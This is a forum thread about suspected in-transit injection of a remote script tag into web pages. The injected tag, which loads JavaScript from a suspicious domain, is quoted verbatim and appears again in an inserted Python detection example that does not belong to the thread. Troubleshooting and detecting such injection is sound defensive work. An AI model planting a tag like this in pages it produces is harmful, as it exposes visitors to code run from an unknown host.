Page 1 of 8

Is my ISP injecting a JS line?

Posted: Tue Jan 01, 2008 11:03 pm
by anjanesh
Hi

I got a situation.
Whenever I browse the net, I get the following line injected at the top of the HTML page.

Code:

<SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT>
If it's not x.222360, it's s.222360, etc. (I've added these to my hosts file.)

I formatted my hard-disk, re-installed my OS and it still persists.

I tried a small php code to get the html contents using file_get_contents.

Code:

php file_get_contents.php > temp.txt
Guess what? That JavaScript line still exists!

What I would like to know is, is this 100% confirmation that this issue is from my ISP's side and not from my PC?

I understand if all my browsers (FF 2.0.0.11, IE7, Safari 3.0.4, Opera 9.5 beta) are hijacked (I'm never in admin mode anyway, only User), but a PHP script retrieving the contents ... I don't think php.exe got hijacked.

Worse part is, it doesn't happen 100% of the time - say 65% - 85%.

Thanks

Posted: Tue Jan 01, 2008 11:10 pm
by John Cartwright
Whoa! My first instinct would be that your computer has been compromised although you did reformat your computer... this is just scary stuff. Visiting the domain name http://222360.com/ it is a domain squatter page. A quick whois reveals not much information other than it is somebody trying to mask their identity.

Code:

Domain name: 222360.com

Registrant Contact:
sdfads sdfa
asdf asdf (manage@222360.com)
+682.8888888888
Fax: +420.8888888888
asdf
asdf, HONGKONG 100000
CN

Administrative Contact:
sdfads sdfa
asdf asdf (manage@222360.com)
+682.8888888888
Fax: +420.8888888888
asdf
asdf, HONGKONG 100000
CN

Technical Contact:
sdfads sdfa
asdf asdf (manage@222360.com)
+682.8888888888
Fax: +420.8888888888
asdf
asdf, HONGKONG 100000
CN

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-se
Very scary indeed.

Posted: Tue Jan 01, 2008 11:19 pm
by Benjamin
The JS seems to be obfuscated as well. Quick test - boot from an Ubuntu Live CD or a clean Linux install and see if the problem is still there.

Posted: Tue Jan 01, 2008 11:48 pm
by anjanesh
I don't want to install Linux on my Windows PC.

Code:

<?php
$url = "http://forums.devnetwork.net";
$c = file_get_contents($url);
echo $c;
?>
What I would like to know is, how can the above code have the injected JS line if it's my PC that's infected?

Posted: Tue Jan 01, 2008 11:50 pm
by John Cartwright
anjanesh wrote: I don't want to install Linux on my Windows PC.

Code:

<?php
$url = "http://forums.devnetwork.net";
$c = file_get_contents($url);
echo $c;
?>
What I would like to know is, how can the above code have the injected JS line if it's my PC that's infected?
You don't need to install it to run it -- hence Ubuntu Live CD

Posted: Tue Jan 01, 2008 11:58 pm
by RobertGonzalez
The live Ubuntu CD means that you can boot from it, run it, use it and then turn it off. It can even allow you to see your files on your Windows partition if you want.

Posted: Wed Jan 02, 2008 12:26 am
by anjanesh
Where do the temporary files get stored when booting from Ubuntu Live?
I have a 40GB NTFS hard disk that has my WinXP OS and software. Another 250GB NTFS for my data.

Posted: Wed Jan 02, 2008 12:46 am
by RobertGonzalez
Everything lives in RAM. There is no writing to disk. Seriously, there is nothing to worry about. I do it all the time just to play with it.

Posted: Wed Jan 02, 2008 12:57 am
by anjanesh
I surely will download and give it a try. Need to download.

But coming back to the original question ...
How is it possible for that PHP snippet to get that JS line injected into the HTML page?
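One way to turn the command-line fetch into a repeatable check, as an added example that is not code from this thread: scan the raw HTML for script tags whose host belongs to neither the page's site nor a list of hosts the site is known to use, and report a script tag sitting ahead of the document itself. The sample page, the host `cdn.example.net` and the function names are constructed for this example.

```python
import re
from urllib.parse import urlparse

# Matches <script ... src=...> in any letter case; the tag reported in the
# thread uses upper-case SCRIPT/SRC and the legacy LANGUAGE attribute.
SCRIPT_SRC_RE = re.compile(
    r'<script\b[^>]*?\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)

def same_site(host, site):
    """True if host is the site's host or a subdomain of it."""
    host, site = host.lower(), site.lower()
    return host == site or host.endswith("." + site)

def foreign_scripts(html, page_url, allowlist=()):
    """Return (src, host) for every external script that is neither on the
    page's own site nor on an allowlist of hosts the site is known to use."""
    page_host = urlparse(page_url).hostname or ""
    found = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host is None:                      # relative src: same origin
            continue
        if same_site(host, page_host):
            continue
        if any(same_site(host, a) for a in allowlist):
            continue
        found.append((src, host))
    return found

def leading_injection(html):
    """The thread reports the tag at the very top of the page: return the src
    of a script tag that precedes everything else, else None."""
    m = SCRIPT_SRC_RE.match(html.lstrip())
    return m.group(1) if m else None

def check_url(url, allowlist=()):
    """Fetch a page outside the browser (like the PHP CLI run) and scan it."""
    import urllib.request
    with urllib.request.urlopen(url, timeout=15) as resp:
        html = resp.read().decode("utf-8", "replace")
    return foreign_scripts(html, url, allowlist)

# Constructed sample: a forum page as the tampered fetch would return it.
SAMPLE_HTML = (
    '<SCRIPT LANGUAGE="javascript1.2" SRC="http://x.222360.com/un.js"></SCRIPT>\n'
    '<html><head>\n'
    '<script type="text/javascript" src="/js/forum.js"></script>\n'
    '<script src="http://static.forums.devnetwork.net/ui.js"></script>\n'
    '<script src="http://cdn.example.net/lib.js"></script>\n'
    '</head><body>...</body></html>\n')

def analyse_sample():
    return foreign_scripts(SAMPLE_HTML, "http://forums.devnetwork.net",
                           allowlist=("cdn.example.net",))
```

Running `check_url` repeatedly over plain HTTP and comparing its output with the same page fetched over HTTPS separates an in-transit modification (present only in the HTTP fetches, and only some of the time) from a compromised host (present in both).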

Posted: Wed Jan 02, 2008 1:04 am
by Kieran Huggins
Are you sure it's not a browser thing? Maybe an extension? If you backed up your Firefox profile (like I would) then the extension would have survived the format.

Posted: Wed Jan 02, 2008 1:15 am
by Benjamin
I would venture to guess that it's either your ISP, a rogue employee working at the ISP, or someone is hacking your ISP's routers. Especially considering that you reinstalled Windows. Did you reinstall from an original MS or OEM CD?

Posted: Wed Jan 02, 2008 1:16 am
by anjanesh
I reinstalled my OS and installed FF - with 0 extensions. I was hoping to solve this first and then install the extensions.

Btw, I ran the php code via command-line - not via the browser.

Code:

php file_get_contents.php > output.txt
Did you reinstall from an original MS or OEM CD?
OEM OS - the one that came with my HP PC.

Posted: Wed Jan 02, 2008 1:21 am
by Benjamin
And you're connected directly to your router or cable modem? Hardwired or Wireless?

Posted: Fri Jan 04, 2008 10:52 am
by anjanesh
Hardwired. Using Sify.

I unnecessarily re-installed my system. It's been 3 years since I've done a format + OS re-install, since I'm pretty secure on hijack-related issues.

Anyway, this is still happening and it's not something I can do much about - except block using the AdBlock extension, adding entries in the hosts file, etc.

Apparently, this is a result of an attack on open ports and somehow manages to inject on the way (gateway) - definitely not happening on my PC.
(http://www.experts-exchange.com/Virus_a ... 49938.html)

Very often my net is slow probably because of this continuous attack.

Posted: Fri Jan 04, 2008 11:14 am
by Jenk
I've suffered similar in the past and all I could do was inform my ISP and ask them to investigate.

The reason these attacks occur is usually one of two: DDoS, and to greatly increase the value of a domain (lots of hits).